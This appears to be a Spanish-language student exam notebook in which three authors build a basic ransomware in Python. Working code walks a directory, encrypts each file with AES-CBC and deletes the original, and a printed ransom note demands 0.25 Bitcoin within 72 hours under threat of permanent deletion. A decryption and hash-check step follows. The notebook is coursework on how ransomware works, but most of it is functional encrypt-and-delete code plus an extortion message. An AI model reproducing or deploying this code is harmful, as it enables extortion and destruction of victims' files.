# **Ransomware**
El objetivo de este examen es desarrollar un ransomware básico en el que se
apliquen todos los conceptos vistos a lo largo del curso

Realizado por: \\
Tábata Nicole Llach Brugés \\
Doriano Alberto Ojeda Diaz \\
Alan Daniel Florez Cerro


In [1]:
!pip install pycryptodome

   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 2.3/2.3 MB 21.6 MB/s eta 0:00:00


In [2]:
import os
from Crypto.PublicKey import RSA
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.Cipher import PKCS1_OAEP, AES
from Crypto.Protocol.KDF import scrypt
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
import base64

**Verificación de la Integridad de Archivos**

In [3]:
def calculate_file_hash(file_path):
    """Calculates the SHA-256 hash of the given file."""
    sha256_hash = SHA256.new()
    try:
        with open(file_path, "rb") as file:
            # Read and update hash string value in blocks of 4K
            for byte_block in iter(lambda: file.read(4096), b""):
                sha256_hash.update(byte_block)
    except FileNotFoundError:
        return None
    return sha256_hash.hexdigest()

def verify_file_integrity(file_to_verify,original_hash):
    """Verifies the integrity of the current file against the original file."""
    current_hash = calculate_file_hash(file_to_verify)

    if original_hash is None or current_hash is None:
        return False

    return original_hash == current_hash


**Escaneo de Archivos para Cifrado y Cálculo de Hashes**

In [4]:
def get_files_to_encrypt() -> list:
  scan_directory = './sample_data'

  files_to_encrypt = []
  file_path = []
  for root, dirs, files in os.walk(scan_directory):
      for file in files:
        if not file.startswith('.'):
          file_path.append(os.path.join(root, file))
          file_path.append(calculate_file_hash(os.path.join(root, file)))
          files_to_encrypt.append(file_path)
        file_path = []

  return files_to_encrypt

**Par de Llaves RSA de 2048 bits**

In [5]:
def generate_rsa_key_pair():
    key = RSA.generate(2048)
    private_key = key.export_key()
    public_key = key.publickey().export_key()
    return private_key, public_key

**Certificado Digital con Identidad y Llave Pública**

In [6]:
def create_certificate(identity, public_key):
    return {
        'id': identity,
        'pk': base64.b64encode(public_key).decode('utf-8')
    }

**Cifrar Archivos utilizando AES en Modo CBC**

In [7]:
def encrypt_file(file_path, key):
    with open(file_path, 'rb') as f:
        plaintext = f.read()

    iv = get_random_bytes(16)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
    with open(file_path + '.enc', 'wb') as f:
        f.write(iv + ciphertext)
    # eliminar archivo original
    os.remove(file_path)

**Descifrar Archivos Utilizando AES en Modo CBC**

In [8]:
def decrypt_file(file_path, key):
    with open(file_path + '.enc', 'rb') as f:
        ciphertext = f.read()

    iv = ciphertext[:16]
    cipher = AES.new(key, AES.MODE_CBC, iv)
    plaintext = unpad(cipher.decrypt(ciphertext[16:]), AES.block_size)
    with open(file_path, 'wb') as f:
        f.write(plaintext)
    # eliminar archivo cifrado
    os.remove(file_path + '.enc')

In [9]:
def verify_files(files_to_encrypt):
    for file_path in files_to_encrypt:
        if os.path.exists(file_path[0] + '.enc'):
            print(r'El archivo {} ha sido cifrado'.format(file_path))
        else:
            print(r'El archivo {} es decriptado'.format(file_path))

In [22]:
if __name__ == '__main__':
  # Pares de claves RSA de 2048 bits para el atacante y la víctima. Estas claves se utilizarán para el cifrado asimétrico y las firmas digitales.
  attacker_private_key, attacker_public_key = generate_rsa_key_pair()
  victim_private_key, victim_public_key = generate_rsa_key_pair()
  # Certificados digitales
  attacker_cert = create_certificate('attacker', attacker_public_key)
  victim_cert = create_certificate('victim', victim_public_key)

  # Mensaje a firmar y cifrar de 1024 bits
  session_key = get_random_bytes(128)

  hash_session_key = SHA256.new(session_key)

  # Firma digital
  signature = pkcs1_15.new(RSA.import_key(attacker_private_key)).sign(hash_session_key)

  # Cifrado del mensaje con la clave pública de la víctima
  cipher_rsa = PKCS1_OAEP.new(RSA.import_key(victim_public_key))
  encrypted_session_key = cipher_rsa.encrypt(session_key)

  # Verificar la firma con la clave pública del atacante
  try:
      pkcs1_15.new(RSA.import_key(attacker_public_key)).verify(hash_session_key, signature)
      print("La firma es válida.")
  except (ValueError, TypeError):
      print("La firma no es válida.")

  # Descifrar el mensaje con la clave privada de la víctima
  cipher_rsa_victim = PKCS1_OAEP.new(RSA.import_key(victim_private_key))
  decrypted_session_key = cipher_rsa_victim.decrypt(encrypted_session_key)


  # Derivar la clave AES usando scrypt
  salt = get_random_bytes(16)
  aes_key = scrypt(decrypted_session_key, salt, 32, N=2**14, r=8, p=1)  # AES-256 requiere una clave de 32 bytes


  # Cifrar los archivos escaneados dentro del disco.
  files_to_encrypt = get_files_to_encrypt()
  print(files_to_encrypt)
  for file_path in files_to_encrypt:
    encrypt_file(file_path[0], aes_key)


La firma es válida.
[['./sample_data/README.md', 'a63d715f48c25c4f0b207afe4d7eb1547b08b92c33b126971e701e9590e1173d'], ['./sample_data/anscombe.json', '90438f1f2421013b58106a7eac28a289604c70e7bdaa28b829d6d8f5bd43c742'], ['./sample_data/california_housing_train.csv', 'bb9ca4041a66e0ed691cb825188f16fdab518435c4950a080951be2fdfe30d4d'], ['./sample_data/california_housing_test.csv', 'be3f531aac5aca44fe1c04fd888b4aa68a9a69f69c05d0eb2e0473dfe702dda2'], ['./sample_data/mnist_train_small.csv', '1ef64781aa03180f4f5ce504314f058f5d0227277df86060473d973cf43b033e'], ['./sample_data/mnist_test.csv', '51c292478d94ec3a01461bdfa82eb0885d262eb09e615679b2d69dedb6ad09e7']]


In [23]:
for file_path in files_to_encrypt:
    if verify_file_integrity(file_path[0], file_path[1]):
        print(f"El archivo '{file_path[0]}' no está cifrado.")
    else:
        print(f"El archivo '{file_path[0]}' está cifrado.")

El archivo './sample_data/README.md' está cifrado.
El archivo './sample_data/anscombe.json' está cifrado.
El archivo './sample_data/california_housing_train.csv' está cifrado.
El archivo './sample_data/california_housing_test.csv' está cifrado.
El archivo './sample_data/mnist_train_small.csv' está cifrado.
El archivo './sample_data/mnist_test.csv' está cifrado.


In [24]:
# Notificación al usuario
print("                 ¡IMPORTANTE! TODOS SUS ARCHIVOS HAN SIDO CIFRADOS")
print(f"\nHemos cifrado {len(files_to_encrypt)} de sus archivos importantes en este equipo.")
print("Para recuperar sus archivos, siga las siguientes instrucciones:\n")

print("1. Realice un pago de 0.25 Bitcoins a la siguiente dirección:")
print("   Dirección de Bitcoin: 4AD5214DS3FS2G1DFG3B1B5B3FDB4D5HH3H1")

print("\n2. Envíe un correo electrónico con su ID de transacción a:")
print("   correo@ejemplo.com")

print("\n3. Una vez que confirmemos la transacción, le enviaremos la clave para descifrar sus archivos.")

print("\nADVERTENCIA:")
print("- No intente descifrar sus archivos por su cuenta; puede causar daños permanentes.")
print("- Si no realiza el pago en 72 horas, todos sus archivos serán eliminados permanentemente.")

print("\n¡Gracias por su cooperación!")

                 ¡IMPORTANTE! TODOS SUS ARCHIVOS HAN SIDO CIFRADOS

Hemos cifrado 6 de sus archivos importantes en este equipo.
Para recuperar sus archivos, siga las siguientes instrucciones:

1. Realice un pago de 0.25 Bitcoins a la siguiente dirección:
   Dirección de Bitcoin: 4AD5214DS3FS2G1DFG3B1B5B3FDB4D5HH3H1

2. Envíe un correo electrónico con su ID de transacción a:
   correo@ejemplo.com

3. Una vez que confirmemos la transacción, le enviaremos la clave para descifrar sus archivos.

ADVERTENCIA:
- No intente descifrar sus archivos por su cuenta; puede causar daños permanentes.
- Si no realiza el pago en 72 horas, todos sus archivos serán eliminados permanentemente.

¡Gracias por su cooperación!


In [25]:
#notify victim how to decrypt files
print("utiliza la siguiente clave para decryptar tus archivos: ", base64.b64encode(aes_key))

utiliza la siguiente clave para decryptar tus archivos:  b'YoXE4oppRxtoIfkqUSIrLJdbFDcHSaHE0o9s/vNkCqA='


In [26]:
for file_path in files_to_encrypt:
  decrypt_file(file_path[0], aes_key)

In [28]:
for file_path in files_to_encrypt:
    # Verificamos la integridad del archivo comparando el hash actual con el original
    if verify_file_integrity(file_path[0], file_path[1]):
        print(f"El archivo '{file_path[0]}' no sigue cifrado y mantiene su integridad a pesar del ataque.")
    else:
        print(f"El archivo '{file_path[0]}' sigue cifrado o ha sido corrompido.")


El archivo './sample_data/README.md' no sigue cifrado y mantiene su integridad a pesar del ataque.
El archivo './sample_data/anscombe.json' no sigue cifrado y mantiene su integridad a pesar del ataque.
El archivo './sample_data/california_housing_train.csv' no sigue cifrado y mantiene su integridad a pesar del ataque.
El archivo './sample_data/california_housing_test.csv' no sigue cifrado y mantiene su integridad a pesar del ataque.
El archivo './sample_data/mnist_train_small.csv' no sigue cifrado y mantiene su integridad a pesar del ataque.
El archivo './sample_data/mnist_test.csv' no sigue cifrado y mantiene su integridad a pesar del ataque.
